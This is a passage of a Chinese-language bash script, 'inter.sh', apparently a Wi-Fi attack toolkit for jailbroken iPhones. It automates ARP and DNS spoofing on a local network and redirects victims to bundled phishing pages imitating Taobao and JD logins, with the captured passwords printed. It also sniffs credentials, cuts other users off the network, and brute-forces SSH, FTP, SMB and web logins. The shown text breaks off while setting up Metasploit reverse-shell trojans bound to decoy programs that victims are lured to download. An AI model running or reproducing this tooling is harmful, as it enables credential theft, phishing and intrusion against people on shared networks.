-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathinter.sh
775 lines (767 loc) · 33.6 KB
/
inter.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
#!/bin/bash
# 这是一个快速抓包的脚本
# 你可以直接修改脚本或优化某个工具包模块
# 因分享而进步
# 作者: CraK
# 中文源:http://crak.cn/repo/
if [ "$UID" != 0 ];then echo "以root用户运行!";exit 0;fi
update(){ sed -i'' ' s/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;' $1 ; wait ;ldid -s $1
}
#断开wifi修复非法进程
repair_new(){
update /bin/grep
update /sbin/ifconfig
update /usr/bin/awk
update /usr/local/bin/arp-scan
update /usr/bin/hydra
update /bin/ping
update /usr/sbin/dsniff
update /usr/local/bin/medusa
update /usr/sbin/arpspoof
update /usr/sbin/dnsspoof
update /usr/sbin/filesnarf
update /usr/sbin/macof
update /usr/sbin/urlsnarf
update /usr/bin/pirni
update /usr/bin/ipwn
update /usr/local/bin/etterfilter
update /usr/local/bin/ettercap
update /usr/local/bin/etterlog
}
if [ "$1" == "-x" ];then echo "正在修复无法启动和运行出错问题....";cd /var/mobile/pentest/inter/msfmod/;./sl;repair_new > /dev/null 2>&1 ;wait;ifconfig en0 PROMISC 2>/dev/null;echo "完成";exit 0
elif [ "$1" == "-o" ] && [ ! -z "$2" ];then echo "正在过滤pcap包...";cat $2|grep -a -i '^Hos\|Coo\|Refer\|User\|Acc' > inter-pcap.log.log;echo "过滤后的保持当前目录inter-pcap.log";exit
elif [ "$1" == "-q" ];then echo "已关闭所有进程..";sleep .5;killall bash;fi
echo
d1='\033[32m'
d2='\033[0m'
c1='\E[1;34m'
c2='\E[0m'
b1='\E[1;31m'
b2='\E[0m'
echo -e "${b1} @@ @@@@ @@@@ ${b2}"
echo -e "${b1} @@ @ @ @@ ${b2}"
echo -e "${b1} @@ @ @ @ @@ ${b2}"
echo -e "${b1}@@@@@@@@@@@@@@@@@@@@@@@${b2}"
echo -e "${b1} ## ## ${b2}"
echo -e "${b1} ## ## ${b2}"
echo -e "${b1}## ## ## ## ${b2}"
echo -e "${b1}## ############ ## ${b2}"
echo -e "${b1}## ## WI-FI ## ## ${b2}"
echo -e "${b1} ## ############ ## ${b2}"
echo -e "${b1} ## # # ## ${b2}"
echo -e "${b1} # # # # ${b2}"
echo -e "${b1} # # # # ${b2}"
echo -e "${b1} # # # # ${b2}"
echo -e "${b1} # ## ## ## # ${b2}"
echo -e "${b1} ################### ${b2}"
echo -e "${b1} # # ${b2}"
echo -e "${b1} ############### ${b2}"
echo -e "${b1} ## ## ${b2}"
echo -e "${b1} # # inter-v1.4-5 ${b2}"
echo -e "${b1} py:CraK${b2}"
echo " 中文源:crak.cn/repo/ "
echo -e "${c1} +++加载中.....${c2}"
repair_ldid() { echo "修复工具" $ok;echo "运行工具包出现的killed:9 ";echo "& illegal instruction 4问题";echo "输入存在以上问题工具包名称后回车";read -p ":" update_repair;if [ -z "$update_repair" ];then
echo " ";else file_repair=`which $update_repair` ;sed -i'' ' s/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;' $file_repair ; wait ;ldid -s $file_repair &>/dev/null;fi
}
install() {
if [ ! -f "/usr/bin/dpkg" ];then echo "正在安装工具包...50%"; cd /var/mobile/pentest/inter/debs/arp-scan/arp-scan/ ;./dpkg -i dpkg.deb; wait ;fi
if [ ! -f "/usr/bin/ldid" ];then dpkg -i /var/mobile/pentest/inter/debs/arp-scan/ldid.deb;fi
#rm -rf /var/mobile/pentest/inter/debs
};install
#dns欺骗相关
etter_fash_dns(){
ettercap -i en0 -Tq -P dns_spoof -M arp:remote // /$router/ >/dev/null &
sleep 5;echo "运行状态:" $?
sysctl -w net.inet.ip.forwarding=1 >/dev/null &
echo "DNS欺骗已经运行!"
echo "监听已启动......";
tail -f /var/www/pass.txt
}
showip(){
if [ ! -d "/var/mobile/pentest/inter" ];then echo "没有配置目录!!";exit;fi
if [ ! -f "/usr/bin/ldid" ];then echo "核心工具包未安装,无法运行..";exit;fi
ok=`echo -e "${d1}[OK]${d2}"`
export localhost_ip=`ifconfig en0|grep broadcast|cut -d " " -f2`
router=`netstat -rn|grep default|grep en0|awk '{printf $2}'`
darwin_name=`uname -r`
darwin_os=`uname -a|cut -d' ' -f15`
neic=`df -h|awk 'NR==4 {print $2}'|cut -d'G' -f1`
if [ $neic -lt 15 ]; then i1=16G
elif [ $neic -lt 27 ];then i2=32G
elif [ $neic -lt 60 ];then i3=64G
else i4=128G ;fi
unll="/var/mobile/pentest/inter/hostlist"
hack_user="/var/mobile/pentest/inter/medusa/user.txt";sleep 2
show_local_ip=`arp-scan -lNI en0 -t 5|sed -n '/:..:/'p | nl > $unll` > /dev/null 2>&1
wait
if [ ! -s "$unll" ];then echo "请确保连接到wifi";sleep 3;echo "遇到一个错误..";echo "正在尝试自动修复...";repair_new > /dev/null 2>&1;echo "完成\n你可以手动修复它";repair_ldid; exit 0;fi
darwin_licalhost=`cat $unll|wc -l` ;wait ; }
darwin() {
echo -e "${b1} +++本机设备:${b2}" "${d1}$darwin_os $i1 $i2 $i3 $i4 ${d2}"
echo -e "${b1} +++内核版本:${b2}" "${d1}$darwin_name${d2}"
echo -e "${b1} +++路由器IP:${b2}" "${d1}$router${d2}"
echo -e "${b1} +++本机 IP:${b2}" "${d1}$localhost_ip${d2}"
echo -e "${b1} +++已扫描局域网连接数为${b2}" "${d1}$darwin_licalhost${d2}" "${b1}台设备${b2}"
cat $unll ;}
ipport() {
ncport="/var/mobile/pentest/inter/ncport.txt"
cat $unll | awk '{print $2}' >$ncport
for i in `cat $ncport`;do
{
nc -v -z -n -w 2 $i http ssh ftp telnet 135 139 445 5900 2222
}&
done;wait;rm $ncport
};tubiao=`echo -e "${c1}#=======|:${c2}"`
scanip() {
echo "输入IP序列号1~${darwin_licalhost}"
read -p $tubiao ip ; if [ -z "$(echo $ip|sed -n "/^[0-9]\+$/p")" ];then echo "请输入数字!";continue;else scan=`cat $unll|awk -v a=$ip 'NR==a{print $2}'`
echo -e "${b1}已选择IP:${b2}" $scan ; echo -e "${b1}是否开始运行?(y|n)${b2}"; read key; fi
}; pwninter() {
showip
ifconfig pdp_ip0 down 2>/dev/null
darwin
while : ;do
echo -e "${b1}===============选择列表====================${b2}"
echo -e "${b1} [1].intercepter [6].mitm attcak${b2}"
echo -e "${b1} [2].Ettercap-ng [7].Medusa${b2}"
echo -e "${b1} [3].ngrep-script [8].scan port ${b2}"
echo -e "${b1} [4].CUPP passwd [9].Repair tool ${b2}"
echo -e "${b1} [5].print derv [0].Exit ${b2}"
echo -e "${b1} ${b2}"
echo -e "${b1} [10].Hydra [11].Metasploit ${b2}"
echo -e "${b1} [12].help ${b2}"
echo -e "${b1}=========================================${b2}"
echo -e "${c1}选择功能模块${c2}"
read -p $tubiao ka
case "$ka" in
1) which ettercap >/dev/null 2>&1
if [ $? -ne 0 ];then echo "ettercap未安装!!!";continue;fi
echo "intercepter-ng" $ok
echo "输入IP序列号1~${darwin_licalhost}"
read -p "目标IP1: " ip;if [ -z "$(echo $ip|sed -n "/^[0-9]\+$/p")" ]; then echo "IP1不能为空!";continue;else scan=`cat $unll|awk -v a=$ip 'NR==a{print $2}'`
read -p "目标IP2: " ip1; scan1=`cat $unll|awk -v b=$ip1 'NR==b{print $2}'`
read -p "目标IP3: " ip2; scan2=`cat $unll|awk -v b=$ip2 'NR==b{print $2}'`
echo -e "${b1}已选择IP(1~3):${b2}" $scan $scan1 $scan2
echo -e "${b1}是否开始运行?(y|n)${b2}"; read key;if [ -z "$key" ]; then echo "输入为空"
elif [ "$key" == "y" ]; then cd /var/mobile/pentest/inter/intercepter;./intercepter 1 2 w -gw $router -t1 $scan -t2 $scan1 -t3 $scan2
else echo ""; fi;fi
;;
2)
echo "Ettercap-ng" $ok ;etterdns="/usr/local/share/ettercap/etter.dns";
echo -e "${b1} [1].抓取所有数据包 ${b2}"
echo -e "${b1} [2].DNS欺骗所有主机 ${b2}"
echo -e "${b1} [3].DNS欺骗单个主机 ${b2}"
echo -e "${b1} [4].使用本机HTTP欺骗 ${b2}"
echo -e "${b1} [5].使用预定义HTML文件 ${b2}"
read -p $tubiao dnsspoof
case "$dnsspoof" in
1) path_etter_pcap="/var/mobile/pentest/inter/ettercap.pcap"
echo "这将通过ettercap抓取所有主机数据包(y|n)?";read -p $tubiao etter_pcap;if [ "$etter_pcap" == "y" ];then
ettercap -i en0 -Tq -M arp:remote // /$router/ -w $path_etter_pcap >/dev/null &
sleep 6; sysctl -w net.inet.ip.forwarding=1 ;echo "ettercap抓包已经后台运行中,输入'0'可结束";fi ;;
2) which ping >/dev/null 2>&1
if [ $? == 0 ];then echo "ping命令未安装!!!";continue;fi
echo "输入重定向网址" ; read url ; echo -e "${b1}是否开始运行?(y|n)${b2}" ; read key; if [ "$key" == "y" ]&&[ -n "$key" ]&&[ -n "$url" ]; then ping $url -s 1 -c 1 |cut -d'(' -f2 | cut -d')' -f1 |head -n 1|awk '{print "*.*.*\tA\t"$1}' > $etterdns
sleep 2 ;if [ ! -s "$etterdns" ];then echo "无效网址!请先浏览器访问测试下!";echo $url;killall ping 2>/dev/null; else
ettercap -i en0 -Tq -P dns_spoof -M arp:remote // /$router/ >/dev/null &
sleep 3 ;sysctl -w net.inet.ip.forwarding=1 ; fi ;fi ;;
3)
echo "输入IP序列号1~${darwin_licalhost}"
expr $ip "+" 1 &>/dev/null
read -p $tubiao ip
if [ -z "$ip" ]&&[ -z "$dnsspoof" ]; then
echo "输入为空!!!"
continue
else
scan=`cat $unll|awk -v a=$ip 'NR==a{print $2}'`
echo -e "${b1}已选择IP:${b2}" $scan
echo "输入重定向网址";read url
echo -e "${b1}是否开始运行?(y|n)${b2}"; read key ;echo '检测网址...'
if [ "$key" == "y" ]&&[ -n "$key" ]&&[ -n "$url" ]; then
ping $url -s 1 -c 1 |cut -d'(' -f2 | cut -d')' -f1 |head -n 1|awk '{print "*\tA\t"$1}' > $etterdns 2>/dev/null &
ping $url -s 2 -c 1 |cut -d'(' -f2 | cut -d')' -f1 |head -n 1|awk '{print "*.*.*\tPTR\t"$1}' >> $etterdns 2>/dev/null &
sleep 2
if [ ! -s "$etterdns" ];then
echo "无效网址!请先浏览器访问测试下!";echo $url
killall ping 2>/dev/null
else
ettercap -i en0 -Tq -P dns_spoof -M arp:remote /$scan/ /$router/ -w /var/mobile/pentest/inter/ettercap/log.pcap >/dev/null &
sleep 3;echo $?
sysctl -w net.inet.ip.forwarding=1 >/dev/null &
echo "DNS欺骗已经运行!如果你需要关闭ettercap";echo "请输入0关闭ettercap";read inputer;if [ "$inputer" == "0" ];then killall ettercap 2>/dev/null;fi
read back ;fi;else echo "输入错误!"
fi; fi ;;
4)
echo -e "\e[1;33m这将网络重定向到本机80端口,这需要你安装依赖后\n在/var/www/目录下存放index.html网站文件你\n可以添加你想要的任意效果 :p这\n将欺骗整个局域网"; echo "---"
which lighttpd >/dev/null 2>&1
if [ $? -eq 0 ];then
trap 'continue' INT
echo -e "输入你需要当目标机访问域名执行重定向的网站\n格式如*.qq.com";
read -p $tubiao url1
lighttpd -f /etc/lighttpd.conf >/dev/null 2>&1
if [ ! -n "$url1" ];then continue
else trap 'continue' INT
echo "这是预定义html文件,针对你输入网站重定向"
echo -e "\e[1;33m"
echo "[1] 恶搞弹窗"
echo "[2] 淘宝钓鱼(手机版)"
echo "[4] 京东钓鱼(电脑版)"
echo "[0] 使用自定义"
echo "你的选择";
read -p $tubiao fash_dns
if [ "$fash_dns" == "1" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/1/* /var/www
chmod 777 /var/www/pass.txt
echo $localhost_ip | awk -v c=$url1 '{print c "\tA\t" $1}' > /usr/local/share/ettercap/etter.dns
ettercap -i en0 -Tq -P dns_spoof -M arp:remote // /$router/ >/dev/null &
sleep 5 ;echo "运行状态:" $?
sysctl -w net.inet.ip.forwarding=1 >/dev/null &
echo "DNS欺骗已经运行!如果你需要关闭ettercap";echo "请输入0关闭ettercap"
read -p ':' inputer
if [ "$inputer" == "0" ];then killall ettercap 2>/dev/null;fi
fi
if [ "$fash_dns" == "2" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/2/* /var/www
chmod 777 /var/www/pass.txt
echo $localhost_ip | awk -v c=$url1 '{print c "\tA\t" $1}' > /usr/local/share/ettercap/etter.dns
sleep .5
echo "[*]"
etter_fash_dns
fi
if [ "$fash_dns" == "4" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/3/* /var/www
chmod 777 /var/www/pass.txt
echo $localhost_ip | awk -v c=$url1 '{print c "\tA\t" $1}' > /usr/local/share/ettercap/etter.dns
sleep .5
echo "[*]"
etter_fash_dns
fi
if [ "$fash_dns" == "0" ];then
echo "使用默认/var/www/index.html"
echo $localhost_ip | awk -v c=$url1 '{print c "\tA\t" $1}' > /usr/local/share/ettercap/etter.dns
ettercap -i en0 -Tq -P dns_spoof -M arp:remote // /$router/ >/dev/null &
sleep 5 ;echo "运行状态:" $?
sysctl -w net.inet.ip.forwarding=1 >/dev/null &
echo "DNS欺骗已经运行!如果你需要关闭ettercap";echo "请输入0关闭ettercap"
read -p ':' inputer
if [ "$inputer" == "0" ];then killall ettercap 2>/dev/null;fi
fi
fi
else
echo "...."
echo "未检测到本机安装lighttpd服务"
echo "请到cydia中安装lighttpd"
echo "...."
fi ;;
5)
which lighttpd >/dev/null 2>&1
if [ $? -eq 0 ];then echo "[*]";sleep .5
trap 'continue' INT
echo "这是一些预定义的html文件,针对整个局域网使用"
echo -e "\e[1;33m"
echo "[1] 恶搞弹窗"
echo "[2] 淘宝钓鱼(手机版)"
echo "[4] 京东钓鱼(电脑版)"
echo "你的选择";
read -p $tubiao fash_dns
if [ "$fash_dns" == "1" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/1/* /var/www
ettercap -i en0 -Tq -P dns_spoof -M arp:remote // /$router/ >/dev/null &
sleep 5;echo "运行状态:" $?
sysctl -w net.inet.ip.forwarding=1 >/dev/null &
echo "DNS欺骗已经运行!如果你需要关闭ettercap";echo "请输入0关闭ettercap";read -p ':' inputer;if [ "$inputer" == "0" ];then killall ettercap 2>/dev/null;fi
fi
if [ "$fash_dns" == "2" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/2/* /var/www
chmod 777 /var/www/pass.txt
echo -e "\e[1;33m 这将欺DNS骗整个局域网并转向伪造的淘宝登陆界面\n一旦用户登陆,密码将显示出来,建议针对单个主机"
sleep .5
echo "[*]"
etter_fash_dns
fi
if [ "$fash_dns" == "4" ];then
rm /var/www/*
cp /var/mobile/pentest/inter/msfmod/www/3/* /var/www
chmod 777 /var/www/pass.txt
echo -e "\e[1;033m 这将欺DNS骗整个局域网并转向伪造的东京登陆界面\n一旦用户登陆,密码将显示出来,建议针对单个主机"
sleep .5
echo "[*]"
etter_fash_dns
fi
else
echo "lighttpd未安装!!"
fi
esac ;;
3) which lighttpd >/dev/null 2>&1
if [ $? -ne 0 ];then echo "ngrep未安装!!";continue;fi
echo "ngrep-script " $ok;scanip;if [ -z "$key" ]; then echo "输入为空!!!";elif [ "$key" == "y" ]; then
sysctl -w net.inet.ip.forwarding=1
echo "数据将保存到inter目录为ngrep.pcap"
arpspoof -i en0 -t $scan $router > /dev/null 2>&1 &
arpspoof -i en0 -t $router $scan > /dev/null 2>&1 &
path_ngrep="-O /var/mobile/pentest/inter/ngrep.pcap"
ngrep $path_ngrep 'USER|PASS|user|pass|username|password' src host $scan|egrep -A1 ">|USER|PASS|user|pass|username|password"
fi; ;;
4) echo "cupp passwd" $ok
cupp_set(){
cd /var/mobile/pentest/inter/cupp
python cupp.py $proto $path
} ;while : ;do
echo "--------------"
echo "[1] 下载字典 "
echo "[2] 创建字典"
echo "[0] 退出"
echo "--------------"
echo "请输入选择(0-3)" ;read option;case $option in
1) proto="-l" ;cupp_set ;;
#2) proto="-w" ;echo "输入需要修改的词典路径位置";read path;if [ "$path" ];then export path="$path" ;fi;cupp_set ;;
2) proto="-i" ;cupp_set ;;
0) break ;;
*) echo "请选择选择 [1-3]";
echo "按回车键继续. . ." ;read ;clear;;esac; done ;;
5)
which pirni >/dev/null 2>&1
if [ $? -ne 0 ];then echo "pirni未安装!!!";continue;fi
echo "pirni-derv" $ok
echo "这将抓取局域网所有主机数据包!(y|n)?"
read -p $tubiao pipcap
if [ "$pipcap" == "y" ]; then cd /var/mobile/pentest/inter/derv;./b4.sh > /dev/null 2>&1 &
./derv.sh -u -p -c
fi; wait;if [ -f "password1.txt" ] && [ -f "password2.txt" ]; then
rm password1.txt; rm password2.txt;fi
rm inter.pcap &>/dev/null ; ;;
6)
which dsniff >/dev/null 2>&1
if [ $? -ne 0 ];then echo "dsniff未安装!!!";continue;fi
echo "mitm attcak" $ok
echo -e "${b1} [1].wifi kill ${b2}"
echo -e "${b1} [2].dnsspoof ${b2}"
echo -e "${b1} [3].urlsnarf ${b2}"
#echo -e "${b1} [4].使用本机HTTP欺骗 ${b2}"
read -p $tubiao mitm
case "$mitm" in
1)
echo "wifi-kill" $ok ;echo "断开局域网其他用户网络连接";echo "输入IP序列号1~${darwin_licalhost}";
read -p "目标IP1: " ip;if [ -z "$(echo $ip|sed -n "/^[0-9]\+$/p")" ]; then echo "IP1不能为空!";continue;else scan=`cat $unll|awk -v a=$ip 'NR==a{print $2}'`
read -p "目标IP2: " ip1; scan1=`cat $unll|awk -v b=$ip1 'NR==b{print $2}'`
read -p "目标IP3: " ip2; scan2=`cat $unll|awk -v b=$ip2 'NR==b{print $2}'`
echo -e "${b1}已选择IP(1~3):${b2}" $scan $scan1 $scan2
echo -e "${b1}是否开始运行?(y|n)${b2}"; read key;if [ -z "$key" ]; then echo "输入为空"
elif [ "$key" == "y" ]; then
arpspoof -i en0 -t $scan $router > /dev/null 2>&1 &
arpspoof -i en0 -t $scan1 $router > /dev/null 2>&1 &
arpspoof -i en0 -t $scan2 $router > /dev/null 2>&1 &
sysctl -w net.inet.ip.forwarding=0 > /dev/null 2>&1 &
sleep .5;echo "运行状态:" $?;echo "wifikill已经后台运行...";echo "输入'y'停止进程";read -p $tubiao netkill;if [ "$netkill" == "y" ]; then killall arpspoof
sysctl -w net.inet.ip.forwarding=1 > /dev/null 2>&1 &
echo "关闭wifi kill"; fi;fi;fi
;;
2) echo "dnsspoof" $ok ;echo "DNS欺骗局域网所有主机";urlip="/var/mobile/pentest/inter/dnsspoof/host.txt"; echo "输入重定向网址";read -p ':' url
if [ -z "$url" ]; then echo "输入错误!";continue;else echo -e "${b1}是否开始运行?(y|n)${b2}";fi;read dns_key ;if [ "$dns_key" == "y" ]; then ping $url -s 1 -c 1 |cut -d'(' -f2 | cut -d')' -f1 |head -n 1|awk '{print $1" ""*"}' > $urlip
sleep 2 ;sysctl -w net.inet.ip.forwarding=1 >/dev/null 2>&1 &
arpspoof $router > /dev/null 2>&1 &
#arpspoof $scan > /dev/null 2>&1 &
dnsspoof -f $urlip host $router and udp port 53 >/dev/null 2>&1 &
echo "dnsspoof已经启动,退出按0";read -p ':' dns;if [ "$dns" == "0" ];then killall arpspoof;killall dnsspoof;fi;rm $urlip;fi ;;
3) echo "urlsnarf" $ok ;scanip
if [ "$key" == "y" ]&&[ -n "$key" ]; then trap "echo ''" INT;sysctl -w net.inet.ip.forwarding=1 > /dev/null 2>&1 &
arpspoof -i en0 -t $scan $router > /dev/null 2>&1 &
arpspoof -i en0 -t $router $scan > /dev/null 2>&1 &
urlsnarf -i en0 | while read line ; do
echo $line |awk -F "\"" '{print $4}'
echo $line |cut -d"(" -f2|cut -d")" -f1
echo $line >> "/var/mobile/pentest/inter/urlsnarf.log" ; done;echo "已保存urllog.log";fi
esac; ;;
7) which medusa >/dev/null 2>&1
if [ $? -ne 0 ];then echo "medusa未安装!!!";continue;fi
echo "Medusa" $ok
echo "输入IP序列号1~${darwin_licalhost}"; read -p $tubiao ip
if [ -z "$(echo $ip| sed -n "/^[0-9]\+$/p")" ]; then echo "输入为错误!!!";continue;fi
scan=`cat $unll|awk -v a=$ip 'NR==a{print $2}'`; echo -e "${b1}已选择IP:${b2}" $scan
echo "正在扫描'SSH,FTP,Telnet,HTTP,VNC'服务..."; echo "----"
for i in `echo $scan`; do
{
nc -v -n -z -w 1 $scan http ssh ftp telnet 135 139 445 5900 2222
}&
done; wait;echo "----" ;echo "输入需要破解的服务名称";read -p $tubiao port1;
#if [ -z "$(echo $port1| sed -n "/^[a-z]\+$/p")" ];then echo "只能输入服务名称!"
echo "输入密码词典到路径,如果没有直接回车使用默认:"; read -p ":" passwd_list
if [ "$passwd_list" ];then passwd_list="$passwd_list";echo "已设置路径为:" $passwd_list
elif [ "$passwd_list" == "" ];then passwd_list="/var/mobile/pentest/inter/medusa/pass.txt"
echo "这将需要几分钟时间,取决于密码文件的大小"; medusapass="/var/mobile/pentest/inter/medusa/password.txt"
medusa -U "$hack_user" -P "$passwd_list" -h $scan -f -M $port1|while read line; do
if [[ `echo $line | grep -n 'SUCCESS'` == "" ]] ;then echo $line|cut -d"(" -f4|cut -d")" -f1
else echo $line > $medusapass
cat $medusapass ;echo "密码已保存到'inter/medusa/password.txt'中" ;sleep 2;
fi
done
fi
;;
8) echo "---IP刷新---" $ok
showip
cat $unll
echo "---端口扫描---" $ok
ipport; ;;
9) repair_ldid ;;
10)
which hydra >/dev/null 2>&1
if [ $? -ne 0 ];then echo "hydra未安装!!!";continue;fi
echo "Hydra" $ok;echo "输入需要破解的地址";read -p ':' hydra_address;if [ -z "$hydra_address" ];then echo "输入为空!!";continue;fi
echo "输入密码词典到路径,如果没有直接回车使用默认:"; read -p ":" passwd_list
if [ "$passwd_list" ];then passwd_list="$passwd_list";echo "已设置路径为:" $passwd_list
elif [ "$passwd_list" == "" ];then passwd_list="/var/mobile/pentest/inter/medusa/pass.txt";fi
hydra_hack
;;
11) echo "" ;msfautopwn ;;
12) echo "帮助文档";cat /var/mobile/pentest/inter/inter-help.log;echo "";read -p ':';clear ;;
0) rm $unll
killall tail 2>/dev/null
killall ettercap 2>/dev/null
killall arpspoof 2>/dev/null
killall intercepter 2>/dev/null
killall ettercap 2>/dev/null
killall pirni 2>/dev/null
killall bash 2>/dev/null
sysctl -w net.inet.ip.forwarding=1
wait; exit 0 ;;
[a-z]|[A-Z]|*) echo "请输入以上序列号!";read ;;
esac
echo ""
done
}
function hydra_hack(){
while :;do
echo "----------"
echo "[1] TELNET [2] FTP [3] SSH"
echo "[4] RSH [5] SMTP [6] POP3"
echo "[7] SMB [8] IMAP [9] HTTP-PROXY"
echo "[10] HTTP-GET [11] HTTP-POST-FORM"
echo "[12] HTTP-HEAD [13] HTTPS-GET"
echo "[0] 返回"
echo "----------"
echo "输入需要爆破的服务序列号"
read -p ':' hydra_port
case $hydra_port in
1) export PROTO="telnet"
echo "[+] 已选择: TELNET"
break ;;
2) export PROTO="ftp"
echo "[+] 已选择: FTP"
break ;;
3) export PROTO="ssh2"
echo "[+] 已选择: SSH"
break ;;
4) export PROTO="rsh"
echo "[+] 已选择: RSH"
break ;;
5) export PROTO="smtp-auth"
echo "[+] 已选择: SMTP"
break ;;
6) export PROTO="pop3"
echo "[+] 已选择: POP3"
break ;;
7) export PROTO="smb"
echo "[+] 已选择: SMB"
break ;;
8) export PROTO="imap"
echo "[+] 已选择: IMAP"
break ;;
9) export PROTO="http-proxy"
echo "[+] 已选择: HTTP-PROXY"
break ;;
10) export PROTO="http-get"
echo "[+] 已选择: HTTP-GET"
break ;;
11) export PROTO="http-post-form"
echo "[+] 已选择: HTTP-POST-FORM"
echo "[>] 请输入网站的后页例如'index.php?'"
read -p ':' var1
if [ "$var1" ]; then
export var1="$var1"
fi
echo "[>] 请输入参数 例如'{USERNAME_NAME}=^USER^&{PASSWORD_NAME}=^PASS^'"
read -p ':' var2
if [ "$var2" ]; then
export var2=":$var2"
fi
echo "[>] 请输入 /login=failed"
read -p ':' var3
if [ "$var3" ]; then
export var3=":$var3"
fi
break ;;
12) export PROTO="http-head"
echo "[+] 已选择: HTTP-HEAD"
break ;;
13) export PROTO="https-get"
echo "[+] 已选择: HTTPS-GET"
break ;;
0) break;;
*) echo "只能选择 [1-13]";
echo "回车继续..." ; read ;clear ;;
esac
done
sleep .5;echo "正在启动hydra爆破..."
hydra -L "$hack_user" -P "$passwd_list" -e ns -t 15 -f -s -vV "$hydra_address" "$PROTO" /$var1$var2$var3
sleep .5
echo "[>] 完成!"
}
msfautopwn() {
msfpath="/var/mobile/pentest/msf"
if [ ! -d "$msfpath" ];then echo "没有在/var/mobile/pentest/msf检测到你安装msf";echo "请在crak源中安装msf";sleep 2;continue;fi
if [ ! -f "/usr/sbin/lighttpd" ]; then echo -e "\e[1;33m检测...\n未安装Lighttpd,请到cydia搜索安装lighttpd和\nlighttpd Settings,安装完毕后到设置里面重新\n关闭在开启lighttpd服务,成功开启后将生成\n/var/www/目录用于存放文件,msf生成到后门将放\n置此目录,通过dns定向本机80端口,\n诱导受害人下载木马后门";echo '*';sleep 2;continue;fi
sleep .2;echo -e "\e[1;31m********** Metasploit **********";echo "本机80端口状态";nc -v -z -n -w 2 127.0.0.1 http
function encnum(){
echo "【*】输入编码的次数 "
read -p $tubiao num
if [ "$num" ];then export num="$num";fi
}
function payload(){
echo "【*】输入侦听端口 "
read -p $tubiao port
if [ "$port" ];then export port="$port";fi
sleep .2
while :;do
echo -e "\e[1;34m"
echo "[1] KeyLogger.exe "
echo "[2] VNC Viewer.exe "
echo "[3] 蜘蛛纸牌 "
echo "[4] Wget.exe "
echo "[5] Radmin.exe "
echo "[6] SBD.exe "
echo -e "\e[1;37m "
echo "【*】选择以上捆绑程序"
read -p $tubiao yourch
case $yourch in
1)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/klogger.exe"
break ;;
2)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/vncviewer.exe"
break ;;
3)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/spider.exe"
break ;;
4)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/wget.exe"
break ;;
5)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/radmin.exe"
break ;;
6)
export bin="-x /var/mobile/pentest/inter/msfmod/exe/sbd.exe"
break ;;
*) echo -e "\e[1;31m只能选择数字[1-6]!!";
echo "回车继续. . ." ; read ;;
esac
done
while :;do
echo -e "\e[1;34m"
echo "[1] windows/shell/reverse_tcp (Stg)"
echo "[2] windows/shell_reverse_tcp "
echo "[3] windows/meterpreter/reverse_tcp (Stg) "
